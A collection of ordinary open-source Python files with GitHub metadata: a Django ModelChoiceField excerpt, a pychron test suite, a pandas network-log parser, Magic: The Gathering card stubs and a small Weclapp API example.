return self.parent_instance
        # ensure that we compare the values as equal types.
if self.to_field:
orig = getattr(self.parent_instance, self.to_field)
else:
orig = self.parent_instance.pk
if str(value) != str(orig):
raise ValidationError(self.error_messages['invalid_choice'], code='invalid_choice')
return self.parent_instance
def has_changed(self, initial, data):
return False
class ModelChoiceIterator:
def __init__(self, field):
self.field = field
self.queryset = field.queryset
def __iter__(self):
if self.field.empty_label is not None:
yield ("", self.field.empty_label)
queryset = self.queryset
# Can't use iterator() when queryset uses prefetch_related()
if not queryset._prefetch_related_lookups:
queryset = queryset.iterator()
for obj in queryset:
yield self.choice(obj)
def __len__(self):
# count() adds a query but uses less memory since the QuerySet results
# won't be cached. In most cases, the choices will only be iterated on,
# and __len__() won't be called.
return self.queryset.count() + (1 if self.field.empty_label is not None else 0)
def __bool__(self):
return self.field.empty_label is not None or self.queryset.exists()
def choice(self, obj):
return (self.field.prepare_value(obj), self.field.label_from_instance(obj))
class ModelChoiceField(ChoiceField):
"""A ChoiceField whose choices are a model QuerySet."""
# This class is a subclass of ChoiceField for purity, but it doesn't
# actually use any of ChoiceField's implementation.
default_error_messages = {
'invalid_choice': _('Select a valid choice. That choice is not one of'
' the available choices.'),
}
iterator = ModelChoiceIterator
def __init__(self, queryset, *, empty_label="---------",
required=True, widget=None, label=None, initial=None,
help_text='', to_field_name=None, limit_choices_to=None,
**kwargs):
if required and (initial is not None):
self.empty_label = None
else:
self.empty_label = empty_label
# Call Field instead of ChoiceField __init__() because we don't need
# ChoiceField.__init__().
Field.__init__(
self, required=required, widget=widget, label=label,
initial=initial, help_text=help_text, **kwargs
)
self.queryset = queryset
self.limit_choices_to = limit_choices_to # limit the queryset later.
self.to_field_name = to_field_name
def get_limit_choices_to(self):
"""
Return ``limit_choices_to`` for this form field.
If it is a callable, invoke it and return the result.
"""
if callable(self.limit_choices_to):
return self.limit_choices_to()
return self.limit_choices_to
def __deepcopy__(self, memo):
result = super(ChoiceField, self).__deepcopy__(memo)
# Need to force a new ModelChoiceIterator to be created, bug #11183
if self.queryset is not None:
result.queryset = self.queryset.all()
return result
def _get_queryset(self):
return self._queryset
def _set_queryset(self, queryset):
self._queryset = None if queryset is None else queryset.all()
self.widget.choices = self.choices
queryset = property(_get_queryset, _set_queryset)
    # This method is used by ModelChoiceIterator to create the object labels.
    # Override it to customize the label.
def label_from_instance(self, obj):
"""
Convert objects into strings and generate the labels for the choices
presented by this object. Subclasses can override this method to
customize the display of the choices.
"""
return str(obj)
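    # Illustrative note (not part of Django itself): subclassing is the usual
    # way to customize the rendered labels, e.g. for a hypothetical ``Author``
    # model:
    #
    #     class AuthorChoiceField(ModelChoiceField):
    #         def label_from_instance(self, obj):
    #             return "%s <%s>" % (obj.name, obj.email)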
def _get_choices(self):
# If self._choices is set, then somebody must have manually set
# the property self.choices. In this case, just return self._choices.
if hasattr(self, '_choices'):
return self._choices
# Otherwise, execute the QuerySet in self.queryset to determine the
# choices dynamically. Return a fresh ModelChoiceIterator that has not been
# consumed. Note that we're instantiating a new ModelChoiceIterator *each*
# time _get_choices() is called (and, thus, each time self.choices is
# accessed) so that we can ensure the QuerySet has not been consumed. This
# construct might look complicated but it allows for lazy evaluation of
# the queryset.
return self.iterator(self)
choices = property(_get_choices, ChoiceField._set_choices)
def prepare_value(self, value):
if hasattr(value, '_meta'):
if self.to_field_name:
return value.serializable_value(self.to_field_name)
else:
return value.pk
return super().prepare_value(value)
def to_python(self, value):
if value in self.empty_values:
return None
try:
key = self.to_field_name or 'pk'
value = self.queryset.get(**{key: value})
except (ValueError, TypeError, self.queryset.model.DoesNotExist):
raise ValidationError(self.error_messages['invalid_choice'], code='invalid_choice')
return value
def validate(self, value):
return Field.validate(self, value)
def has_changed(self, initial, data):
if self.disabled:
return False
initial_value = initial if initial is not None else ''
data_value = data if data is not None else ''
return str(self.prepare_value(initial_value)) != str(data_value)
class ModelMultipleChoiceField(ModelChoiceField):
"""A MultipleChoiceField whose choices are a model QuerySet."""
widget = SelectMultiple
hidden_widget = MultipleHiddenInput
default_error_messages = {
'list': _('Enter a list of values.'),
'invalid_choice': _('Select a valid choice. %(value)s is not one of the'
' available choices.'),
'invalid_pk_value': _('"%(pk)s" is not a valid value.')
}
def __init__(self, queryset, **kwargs):
super().__init__(queryset, empty_label=None, **kwargs)
def to_python(self, value):
if not value:
return []
return list(self._check_values(value))
def clean(self, value):
value = self.prepare_value(value)
if self.required and not value:
raise ValidationError(self.error_messages['required'], code='required')
elif not self.required and not value:
return self.queryset.none()
if not isinstance(value, (list, tuple)):
raise ValidationError(self.error_messages['list'], code='list')
qs = self._check_values(value)
# Since this overrides the inherited ModelChoiceField.clean
# we run custom validators here
self.run_validators(value)
return qs
def _check_values(self, value):
"""
Given a list of possible PK values, return a QuerySet of the
corresponding objects. Raise a ValidationError if a given value is
invalid (not a valid PK, not in the queryset, etc.)
"""
key = self.to_field_name or 'pk'
        # Deduplicate given values to avoid creating many querysets or
        # requiring the database backend to deduplicate efficiently.
try:
value = frozenset(value)
except TypeError:
# list of lists isn't hashable, for example
raise ValidationError(
self.error_messages['list'],
code='list',
)
for pk in value:
try:
self.queryset.filter(**{key: pk})
except (ValueError, TypeError):
raise ValidationError(
self.error_messages['invalid_pk_value'],
code='invalid_pk_value',
params={'pk': pk},
)
qs = self.queryset.filter(**{'%s__in' % key: value})
pks = {str(getattr(o, key)) for o in qs}
for val in value:
if str(val) not in pks:
raise ValidationError(
self.error_messages['invalid_choice'],
code='invalid_choice',
params={'value': val},
)
return qs
def prepare_value(self, value):
if (hasattr(value, '__iter__') and
not isinstance(value, str) and
not hasattr(value, '_meta')):
prepare_value = super().prepare_value
return [prepare_value(v) for v in value]
return super().prepare_value(value)
def has_changed(self, initial, data):
if self.disabled:
return False
if initial is None:
initial = []
if data is None:
data = []
if len(initial) != len(data):
return True
initial_set = {str(value) for value in self.prepare_value(initial)}
data_set = {str(value) for value in data}
return data_set != initial_set
def modelform_defines_fields(form_class):
return hasattr(form_class, '_meta') and (
form_class._meta.fields is not None or
form_class._meta.exclude is not None
)
| {
"content_hash": "d608fe22abfc92e9874dd919e64ab5dc",
"timestamp": "",
"source": "github",
"line_count": 1360,
"max_line_length": 116,
"avg_line_length": 41.28382352941176,
"alnum_prop": 0.5847789691162327,
"repo_name": "sametmax/Django--an-app-at-a-time",
"id": "fe8a67ed2bb5d5d5cd4d6fa8b5a2aafb4303eac4",
"size": "56146",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ignore_this_directory/django/forms/models.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "76288"
},
{
"name": "HTML",
"bytes": "145951"
},
{
"name": "JavaScript",
"bytes": "118055"
},
{
"name": "Python",
"bytes": "4824263"
}
],
"symlink_target": ""
} |
from create import CommentNewHandler
from delete import CommentDeleteHandler
from edit import CommentEditHandler | {
"content_hash": "308a9ce1b9a8429322dc072a804e58d7",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 39,
"avg_line_length": 37.333333333333336,
"alnum_prop": 0.9017857142857143,
"repo_name": "brusznicki/multi-user-blog",
"id": "783ee33d9108e931175eef710e558ec5f76feb44",
"size": "112",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "handlers/comment/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "361"
},
{
"name": "HTML",
"bytes": "11722"
},
{
"name": "Python",
"bytes": "21746"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from pychron.core.ui import set_qt
set_qt()
__author__ = "ross"
import unittest
import os
from pychron.pyscripts.measurement_pyscript import (
MeasurementPyScript,
MeasurementCTXObject,
)
class DocstrContextTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.script = MeasurementPyScript()
p = "pychron/pyscripts/tests/data/measurement_script.txt"
if not os.path.isfile(p):
p = "./data/measurement_script.txt"
with open(p, "r") as rfile:
cls.script.text = rfile.read()
cls.script.bootstrap()
cls.script.setup_context()
def test_mx(self):
self.assertIsInstance(self.script._ctx["mx"], MeasurementCTXObject)
def test_mx_multicollect_counts(self):
self.assertEqual(self.script._ctx["mx"].multicollect.counts, 5)
def test_mx_baseline_counts(self):
self.assertEqual(self.script._ctx["mx"].baseline.counts, 3)
class InterpolationTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.script = MeasurementPyScript()
cls.script.bootstrap()
p = "pychron/pyscripts/tests/data/script_options.yaml"
if not os.path.isfile(p):
p = "./data/script_options.yaml"
cls.script.interpolation_path = p
def test_warm_cdd(self):
v = self.script.warm_cdd
self.assertEqual(v, False)
def test_float(self):
v = self.script.float_value
self.assertIsInstance(v, float)
def test_fail_attr(self):
# v = self.script.novalue
# self.assertIsNone(v)
self.assertRaises(AttributeError, lambda: self.script.novalue)
def test_execute_snippet(self):
snippet = """def main(): a= float_value+2"""
v = self.script.execute_snippet(snippet)
self.assertIs(v, None)
# snippet = '''def main(): a= float_value+boo*bat'''
# v = self.script.execute_snippet(snippet)
# self.assertIs(v, None)
def test_execute_snippet_fail(self):
snippet = """def main(): a= float_valufe+2"""
v = self.script.execute_snippet(snippet)
self.assertIsInstance(v, str)
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "b72bf4c31dbf0ac4287eee3073db7676",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 75,
"avg_line_length": 28.582278481012658,
"alnum_prop": 0.6328609388839681,
"repo_name": "NMGRL/pychron",
"id": "06f76b2b2ca65ba309a03bff472760e24c237569",
"size": "2258",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "pychron/pyscripts/tests/measurement_pyscript.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "128"
},
{
"name": "C++",
"bytes": "3706"
},
{
"name": "CSS",
"bytes": "263"
},
{
"name": "Cython",
"bytes": "1692"
},
{
"name": "Fortran",
"bytes": "455875"
},
{
"name": "HTML",
"bytes": "46796"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Processing",
"bytes": "11421"
},
{
"name": "Python",
"bytes": "10773692"
},
{
"name": "Shell",
"bytes": "1003"
}
],
"symlink_target": ""
} |
"""
@author: xuk1
@license: (C) Copyright 2013-2017
@contact: [email protected]
@file: network.py
@time: 8/17/2017 12:55
@desc:
"""
import numpy as np
import pandas as pd
from component.base import CommonBase
class Network(CommonBase):
"""
    Node network attribute, parsing network data from the original PAT file
"""
used_col = ['HostName', 'TimeStamp', 'IFACE', 'rxkB/s', 'txkB/s']
converter = {col: np.float32 for col in used_col[3:]}
def __init__(self, file_path):
self.file_path = file_path
def get_data_by_time(self, start, end):
"""
        Get the average value of this attribute and all raw data within each start/end timestamp pair.
        If start and end both equal [0], all of the data is used.
        :param start: list of start timestamps
        :param end: list of end timestamps, must be the same length as start
        :return: tuple (avg, df): avg holds the summed per-NIC averages for each timestamp pair, df is the raw data
"""
df = pd.read_csv(self.file_path, delim_whitespace=True, usecols=self.used_col, header=0)
df = df[df['IFACE'] != 'lo'].reset_index(drop=True)
all_row = list(df['TimeStamp'].str.contains('TimeStamp'))
num_nics = all_row.index(True) # num of NICs
name_nics = df['IFACE'].loc[0:num_nics - 1]
for num in range(num_nics):
if name_nics[num] == 'lo': # drop local nic
name_nics = name_nics.drop(num)
break
df = df[df['TimeStamp'] != 'TimeStamp'] # drop rows from df that contains 'TimeStamp'
pd.to_datetime(df['TimeStamp'], unit='s')
df = df.set_index('TimeStamp').astype(self.converter)
avg = []
if start[0] == end[0] == 0: # calc all the data
nic_avg = pd.DataFrame()
for num in range(num_nics): # processing each nic
nic_data = df.iloc[num:len(all_row):num_nics]
tmp = nic_data.iloc[:, 2:].mean(axis=0) # average of each NICs
nic_avg = nic_avg.append(tmp, ignore_index=True)
avg.append(nic_avg.sum(axis=0)) # sum of all the averaged NICs
if len(start) == 1:
return avg, df
else:
for i in range(1, len(start)): # calc the data within the pair of time period
# raw_all.append(df.loc[str(start[i]): str(end[i])])
nic_avg = pd.DataFrame()
for num in range(num_nics): # processing each nic
nic_data = df.loc[str(start[i]): str(end[i])].iloc[num:len(all_row):num_nics]
tmp = nic_data.iloc[:, 2:].mean(axis=0) # average of each NICs
nic_avg = nic_avg.append(tmp, ignore_index=True)
avg.append(nic_avg.sum(axis=0)) # sum of all the averaged NICs
return avg, df
for i in range(len(start)): # calc the data within the pair of time period
# raw_all.append(df.loc[str(start[i]): str(end[i])])
nic_avg = pd.DataFrame()
for num in range(num_nics): # processing each nic
nic_data = df.loc[str(start[i]): str(end[i])].iloc[num:len(all_row):num_nics]
tmp = nic_data.iloc[:, 2:].mean(axis=0) # average of each nics
nic_avg = nic_avg.append(tmp, ignore_index=True)
avg.append(nic_avg.sum(axis=0)) # sum of all the averaged NICs
return avg, df
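# Illustrative usage sketch (the file path and epoch timestamps are hypothetical):
#
#     net = Network('/path/to/pat/network.log')
#     avg, raw = net.get_data_by_time([0], [0])                    # average over the whole capture
#     avg, raw = net.get_data_by_time([1502945700], [1502945760])  # one explicit window
#
# Each entry of avg is the per-NIC mean of rxkB/s and txkB/s, summed across all
# non-loopback interfaces for that window; raw is the parsed DataFrame.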
| {
"content_hash": "908cb68b7a2a1e5297867c2205765ab5",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 101,
"avg_line_length": 46.03896103896104,
"alnum_prop": 0.5528913963328632,
"repo_name": "kaiseu/pat-data-processing",
"id": "d06c60e6287f73b5b77eb7835fe7764aa33a777f",
"size": "3583",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "component/network.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "63970"
}
],
"symlink_target": ""
} |
from cardboard import types
from cardboard.ability import (
AbilityNotImplemented, spell, activated, triggered, static
)
from cardboard.cards import card, common, keywords, match
@card("Phantasmal Dragon")
def phantasmal_dragon(card, abilities):
def phantasmal_dragon():
return AbilityNotImplemented
def phantasmal_dragon():
return AbilityNotImplemented
return phantasmal_dragon, phantasmal_dragon,
@card("Trollhide")
def trollhide(card, abilities):
def trollhide():
return AbilityNotImplemented
def trollhide():
return AbilityNotImplemented
return trollhide, trollhide,
@card("Chasm Drake")
def chasm_drake(card, abilities):
def chasm_drake():
return AbilityNotImplemented
def chasm_drake():
return AbilityNotImplemented
return chasm_drake, chasm_drake,
@card("Stingerfling Spider")
def stingerfling_spider(card, abilities):
def stingerfling_spider():
return AbilityNotImplemented
def stingerfling_spider():
return AbilityNotImplemented
return stingerfling_spider, stingerfling_spider,
@card("Arbalest Elite")
def arbalest_elite(card, abilities):
def arbalest_elite():
return AbilityNotImplemented
return arbalest_elite,
@card("Stave Off")
def stave_off(card, abilities):
def stave_off():
return AbilityNotImplemented
return stave_off,
@card("Crumbling Colossus")
def crumbling_colossus(card, abilities):
def crumbling_colossus():
return AbilityNotImplemented
def crumbling_colossus():
return AbilityNotImplemented
return crumbling_colossus, crumbling_colossus,
@card("Crown of Empires")
def crown_of_empires(card, abilities):
def crown_of_empires():
return AbilityNotImplemented
return crown_of_empires,
@card("Aegis Angel")
def aegis_angel(card, abilities):
def aegis_angel():
return AbilityNotImplemented
def aegis_angel():
return AbilityNotImplemented
return aegis_angel, aegis_angel,
@card("Titanic Growth")
def titanic_growth(card, abilities):
def titanic_growth():
return AbilityNotImplemented
return titanic_growth,
@card("Throne of Empires")
def throne_of_empires(card, abilities):
def throne_of_empires():
return AbilityNotImplemented
return throne_of_empires,
@card("Tectonic Rift")
def tectonic_rift(card, abilities):
def tectonic_rift():
return AbilityNotImplemented
return tectonic_rift,
@card("Timely Reinforcements")
def timely_reinforcements(card, abilities):
def timely_reinforcements():
return AbilityNotImplemented
return timely_reinforcements,
@card("Arachnus Web")
def arachnus_web(card, abilities):
def arachnus_web():
return AbilityNotImplemented
def arachnus_web():
return AbilityNotImplemented
def arachnus_web():
return AbilityNotImplemented
return arachnus_web, arachnus_web, arachnus_web,
@card("Adaptive Automaton")
def adaptive_automaton(card, abilities):
def adaptive_automaton():
return AbilityNotImplemented
def adaptive_automaton():
return AbilityNotImplemented
def adaptive_automaton():
return AbilityNotImplemented
return adaptive_automaton, adaptive_automaton, adaptive_automaton,
@card("Guardians' Pledge")
def guardians_pledge(card, abilities):
def guardians_pledge():
return AbilityNotImplemented
return guardians_pledge,
@card("Chandra's Phoenix")
def chandras_phoenix(card, abilities):
def chandras_phoenix():
return AbilityNotImplemented
def chandras_phoenix():
return AbilityNotImplemented
def chandras_phoenix():
return AbilityNotImplemented
return chandras_phoenix, chandras_phoenix, chandras_phoenix,
@card("Dungrove Elder")
def dungrove_elder(card, abilities):
def dungrove_elder():
return AbilityNotImplemented
def dungrove_elder():
return AbilityNotImplemented
return dungrove_elder, dungrove_elder,
@card("Aven Fleetwing")
def aven_fleetwing(card, abilities):
def aven_fleetwing():
return AbilityNotImplemented
def aven_fleetwing():
return AbilityNotImplemented
return aven_fleetwing, aven_fleetwing,
@card("Hunter's Insight")
def hunters_insight(card, abilities):
def hunters_insight():
return AbilityNotImplemented
return hunters_insight,
@card("Sorin's Vengeance")
def sorins_vengeance(card, abilities):
def sorins_vengeance():
return AbilityNotImplemented
return sorins_vengeance,
@card("Gladecover Scout")
def gladecover_scout(card, abilities):
def gladecover_scout():
return AbilityNotImplemented
return gladecover_scout,
@card("Bloodlord of Vaasgoth")
def bloodlord_of_vaasgoth(card, abilities):
def bloodlord_of_vaasgoth():
return AbilityNotImplemented
def bloodlord_of_vaasgoth():
return AbilityNotImplemented
def bloodlord_of_vaasgoth():
return AbilityNotImplemented
return bloodlord_of_vaasgoth, bloodlord_of_vaasgoth, bloodlord_of_vaasgoth,
@card("Turn to Frog")
def turn_to_frog(card, abilities):
def turn_to_frog():
return AbilityNotImplemented
return turn_to_frog,
@card("Personal Sanctuary")
def personal_sanctuary(card, abilities):
def personal_sanctuary():
return AbilityNotImplemented
return personal_sanctuary,
@card("Benalish Veteran")
def benalish_veteran(card, abilities):
def benalish_veteran():
return AbilityNotImplemented
return benalish_veteran,
@card("Blood Ogre")
def blood_ogre(card, abilities):
def blood_ogre():
return AbilityNotImplemented
def blood_ogre():
return AbilityNotImplemented
return blood_ogre, blood_ogre,
@card("Frost Breath")
def frost_breath(card, abilities):
def frost_breath():
return AbilityNotImplemented
return frost_breath,
@card("Taste of Blood")
def taste_of_blood(card, abilities):
def taste_of_blood():
return AbilityNotImplemented
return taste_of_blood,
@card("Angelic Destiny")
def angelic_destiny(card, abilities):
def angelic_destiny():
return AbilityNotImplemented
def angelic_destiny():
return AbilityNotImplemented
def angelic_destiny():
return AbilityNotImplemented
return angelic_destiny, angelic_destiny, angelic_destiny,
@card("Druidic Satchel")
def druidic_satchel(card, abilities):
def druidic_satchel():
return AbilityNotImplemented
return druidic_satchel,
@card("Azure Mage")
def azure_mage(card, abilities):
def azure_mage():
return AbilityNotImplemented
return azure_mage,
@card("Arachnus Spinner")
def arachnus_spinner(card, abilities):
def arachnus_spinner():
return AbilityNotImplemented
def arachnus_spinner():
return AbilityNotImplemented
return arachnus_spinner, arachnus_spinner,
@card("Gorehorn Minotaurs")
def gorehorn_minotaurs(card, abilities):
def gorehorn_minotaurs():
return AbilityNotImplemented
return gorehorn_minotaurs,
@card("Bloodrage Vampire")
def bloodrage_vampire(card, abilities):
def bloodrage_vampire():
return AbilityNotImplemented
return bloodrage_vampire,
@card("Devouring Swarm")
def devouring_swarm(card, abilities):
def devouring_swarm():
return AbilityNotImplemented
def devouring_swarm():
return AbilityNotImplemented
return devouring_swarm, devouring_swarm,
@card("Gideon's Avenger")
def gideons_avenger(card, abilities):
def gideons_avenger():
return AbilityNotImplemented
return gideons_avenger,
@card("Crimson Mage")
def crimson_mage(card, abilities):
def crimson_mage():
return AbilityNotImplemented
return crimson_mage,
@card("Garruk's Horde")
def garruks_horde(card, abilities):
def garruks_horde():
return AbilityNotImplemented
def garruks_horde():
return AbilityNotImplemented
def garruks_horde():
return AbilityNotImplemented
return garruks_horde, garruks_horde, garruks_horde,
@card("Duskhunter Bat")
def duskhunter_bat(card, abilities):
def duskhunter_bat():
return AbilityNotImplemented
def duskhunter_bat():
return AbilityNotImplemented
return duskhunter_bat, duskhunter_bat,
@card("Visions of Beyond")
def visions_of_beyond(card, abilities):
def visions_of_beyond():
return AbilityNotImplemented
return visions_of_beyond,
@card("Garruk, Primal Hunter")
def garruk_primal_hunter(card, abilities):
def garruk_primal_hunter():
return AbilityNotImplemented
def garruk_primal_hunter():
return AbilityNotImplemented
def garruk_primal_hunter():
return AbilityNotImplemented
return garruk_primal_hunter, garruk_primal_hunter, garruk_primal_hunter,
@card("Gideon's Lawkeeper")
def gideons_lawkeeper(card, abilities):
def gideons_lawkeeper():
return AbilityNotImplemented
return gideons_lawkeeper,
@card("Stonehorn Dignitary")
def stonehorn_dignitary(card, abilities):
def stonehorn_dignitary():
return AbilityNotImplemented
return stonehorn_dignitary,
@card("Vengeful Pharaoh")
def vengeful_pharaoh(card, abilities):
def vengeful_pharaoh():
return AbilityNotImplemented
def vengeful_pharaoh():
return AbilityNotImplemented
return vengeful_pharaoh, vengeful_pharaoh,
@card("Doubling Chant")
def doubling_chant(card, abilities):
def doubling_chant():
return AbilityNotImplemented
return doubling_chant,
@card("Skinshifter")
def skinshifter(card, abilities):
def skinshifter():
return AbilityNotImplemented
return skinshifter,
@card("Wall of Torches")
def wall_of_torches(card, abilities):
def wall_of_torches():
return AbilityNotImplemented
return wall_of_torches,
@card("Scepter of Empires")
def scepter_of_empires(card, abilities):
def scepter_of_empires():
return AbilityNotImplemented
return scepter_of_empires,
@card("Wring Flesh")
def wring_flesh(card, abilities):
def wring_flesh():
return AbilityNotImplemented
return wring_flesh,
@card("Skywinder Drake")
def skywinder_drake(card, abilities):
def skywinder_drake():
return AbilityNotImplemented
def skywinder_drake():
return AbilityNotImplemented
return skywinder_drake, skywinder_drake,
@card("Divine Favor")
def divine_favor(card, abilities):
def divine_favor():
return AbilityNotImplemented
def divine_favor():
return AbilityNotImplemented
def divine_favor():
return AbilityNotImplemented
return divine_favor, divine_favor, divine_favor,
@card("Lurking Crocodile")
def lurking_crocodile(card, abilities):
def lurking_crocodile():
return AbilityNotImplemented
def lurking_crocodile():
return AbilityNotImplemented
return lurking_crocodile, lurking_crocodile,
@card("Stormblood Berserker")
def stormblood_berserker(card, abilities):
def stormblood_berserker():
return AbilityNotImplemented
def stormblood_berserker():
return AbilityNotImplemented
return stormblood_berserker, stormblood_berserker,
@card("Goblin Bangchuckers")
def goblin_bangchuckers(card, abilities):
def goblin_bangchuckers():
return AbilityNotImplemented
return goblin_bangchuckers,
@card("Scrambleverse")
def scrambleverse(card, abilities):
def scrambleverse():
return AbilityNotImplemented
return scrambleverse,
@card("Alabaster Mage")
def alabaster_mage(card, abilities):
def alabaster_mage():
return AbilityNotImplemented
return alabaster_mage,
@card("Primordial Hydra")
def primordial_hydra(card, abilities):
def primordial_hydra():
return AbilityNotImplemented
def primordial_hydra():
return AbilityNotImplemented
def primordial_hydra():
return AbilityNotImplemented
return primordial_hydra, primordial_hydra, primordial_hydra,
@card("Mind Unbound")
def mind_unbound(card, abilities):
def mind_unbound():
return AbilityNotImplemented
return mind_unbound,
@card("Onyx Mage")
def onyx_mage(card, abilities):
def onyx_mage():
return AbilityNotImplemented
return onyx_mage,
@card("Rusted Sentinel")
def rusted_sentinel(card, abilities):
def rusted_sentinel():
return AbilityNotImplemented
return rusted_sentinel,
@card("Merfolk Mesmerist")
def merfolk_mesmerist(card, abilities):
def merfolk_mesmerist():
return AbilityNotImplemented
return merfolk_mesmerist,
@card("Jace, Memory Adept")
def jace_memory_adept(card, abilities):
def jace_memory_adept():
return AbilityNotImplemented
def jace_memory_adept():
return AbilityNotImplemented
def jace_memory_adept():
return AbilityNotImplemented
return jace_memory_adept, jace_memory_adept, jace_memory_adept,
@card("Chandra, the Firebrand")
def chandra_the_firebrand(card, abilities):
def chandra_the_firebrand():
return AbilityNotImplemented
def chandra_the_firebrand():
return AbilityNotImplemented
def chandra_the_firebrand():
return AbilityNotImplemented
return chandra_the_firebrand, chandra_the_firebrand, chandra_the_firebrand,
@card("Circle of Flame")
def circle_of_flame(card, abilities):
def circle_of_flame():
return AbilityNotImplemented
return circle_of_flame,
@card("Monomania")
def monomania(card, abilities):
def monomania():
return AbilityNotImplemented
return monomania,
@card("Sphinx of Uthuun")
def sphinx_of_uthuun(card, abilities):
def sphinx_of_uthuun():
return AbilityNotImplemented
def sphinx_of_uthuun():
return AbilityNotImplemented
return sphinx_of_uthuun, sphinx_of_uthuun,
@card("Grand Abolisher")
def grand_abolisher(card, abilities):
def grand_abolisher():
return AbilityNotImplemented
return grand_abolisher,
@card("Carnage Wurm")
def carnage_wurm(card, abilities):
def carnage_wurm():
return AbilityNotImplemented
def carnage_wurm():
return AbilityNotImplemented
return carnage_wurm, carnage_wurm,
@card("Lord of the Unreal")
def lord_of_the_unreal(card, abilities):
def lord_of_the_unreal():
return AbilityNotImplemented
return lord_of_the_unreal,
@card("Swiftfoot Boots")
def swiftfoot_boots(card, abilities):
def swiftfoot_boots():
return AbilityNotImplemented
def swiftfoot_boots():
return AbilityNotImplemented
return swiftfoot_boots, swiftfoot_boots,
@card("Warstorm Surge")
def warstorm_surge(card, abilities):
def warstorm_surge():
return AbilityNotImplemented
return warstorm_surge,
@card("Pride Guardian")
def pride_guardian(card, abilities):
def pride_guardian():
return AbilityNotImplemented
def pride_guardian():
return AbilityNotImplemented
return pride_guardian, pride_guardian,
@card("Phantasmal Bear")
def phantasmal_bear(card, abilities):
def phantasmal_bear():
return AbilityNotImplemented
return phantasmal_bear,
@card("Master Thief")
def master_thief(card, abilities):
def master_thief():
return AbilityNotImplemented
return master_thief,
@card("Spirit Mantle")
def spirit_mantle(card, abilities):
def spirit_mantle():
return AbilityNotImplemented
def spirit_mantle():
return AbilityNotImplemented
return spirit_mantle, spirit_mantle,
@card("Rune-Scarred Demon")
def runescarred_demon(card, abilities):
def runescarred_demon():
return AbilityNotImplemented
def runescarred_demon():
return AbilityNotImplemented
return runescarred_demon, runescarred_demon,
@card("Vampire Outcasts")
def vampire_outcasts(card, abilities):
def vampire_outcasts():
return AbilityNotImplemented
def vampire_outcasts():
return AbilityNotImplemented
return vampire_outcasts, vampire_outcasts,
@card("Greatsword")
def greatsword(card, abilities):
def greatsword():
return AbilityNotImplemented
def greatsword():
return AbilityNotImplemented
return greatsword, greatsword,
@card("Sundial of the Infinite")
def sundial_of_the_infinite(card, abilities):
def sundial_of_the_infinite():
return AbilityNotImplemented
return sundial_of_the_infinite,
@card("Manalith")
def manalith(card, abilities):
def manalith():
return AbilityNotImplemented
return manalith,
@card("Sorin's Thirst")
def sorins_thirst(card, abilities):
def sorins_thirst():
return AbilityNotImplemented
return sorins_thirst,
@card("Kite Shield")
def kite_shield(card, abilities):
def kite_shield():
return AbilityNotImplemented
def kite_shield():
return AbilityNotImplemented
return kite_shield, kite_shield,
@card("Hideous Visage")
def hideous_visage(card, abilities):
def hideous_visage():
return AbilityNotImplemented
return hideous_visage,
@card("Dark Favor")
def dark_favor(card, abilities):
def dark_favor():
return AbilityNotImplemented
def dark_favor():
return AbilityNotImplemented
def dark_favor():
return AbilityNotImplemented
return dark_favor, dark_favor, dark_favor,
@card("Griffin Rider")
def griffin_rider(card, abilities):
def griffin_rider():
return AbilityNotImplemented
return griffin_rider,
@card("Tormented Soul")
def tormented_soul(card, abilities):
def tormented_soul():
return AbilityNotImplemented
return tormented_soul,
@card("Phantasmal Image")
def phantasmal_image(card, abilities):
def phantasmal_image():
return AbilityNotImplemented
return phantasmal_image,
@card("Buried Ruin")
def buried_ruin(card, abilities):
def buried_ruin():
return AbilityNotImplemented
def buried_ruin():
return AbilityNotImplemented
return buried_ruin, buried_ruin,
@card("Furyborn Hellkite")
def furyborn_hellkite(card, abilities):
def furyborn_hellkite():
return AbilityNotImplemented
def furyborn_hellkite():
return AbilityNotImplemented
return furyborn_hellkite, furyborn_hellkite,
@card("Jade Mage")
def jade_mage(card, abilities):
def jade_mage():
return AbilityNotImplemented
return jade_mage,
@card("Goblin Fireslinger")
def goblin_fireslinger(card, abilities):
def goblin_fireslinger():
return AbilityNotImplemented
return goblin_fireslinger,
@card("Peregrine Griffin")
def peregrine_griffin(card, abilities):
def peregrine_griffin():
return AbilityNotImplemented
def peregrine_griffin():
return AbilityNotImplemented
return peregrine_griffin, peregrine_griffin,
@card("Jace's Archivist")
def jaces_archivist(card, abilities):
def jaces_archivist():
return AbilityNotImplemented
return jaces_archivist,
@card("Drifting Shade")
def drifting_shade(card, abilities):
def drifting_shade():
return AbilityNotImplemented
def drifting_shade():
return AbilityNotImplemented
return drifting_shade, drifting_shade, | {
"content_hash": "b2a5b1df2e281171889c0d5995ef51c9",
"timestamp": "",
"source": "github",
"line_count": 1019,
"max_line_length": 79,
"avg_line_length": 19.18547595682041,
"alnum_prop": 0.7011253196930947,
"repo_name": "Julian/cardboard",
"id": "09fe47da008fdd447a2409f96748571c540526d1",
"size": "19550",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cardboard/cards/sets/magic_2012.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2656758"
},
{
"name": "Shell",
"bytes": "4517"
}
],
"symlink_target": ""
} |
from weclapp4py import Weclapp
tenant = None
api_key = None
print("Weclapp API Example script")
print("**************************\n")
if tenant is None or api_key is None:
print("You can set tenant and api key inside example.py to avoid the following questions.\n")
tenant = input("Enter company/tenant name: ")
api_key = input("Enter api_key: ")
weclapp = Weclapp(tenant, api_key)
print("\nCounting...")
print("contacts %s" % weclapp.contact.count())
print("customers %s" % weclapp.customer.count())
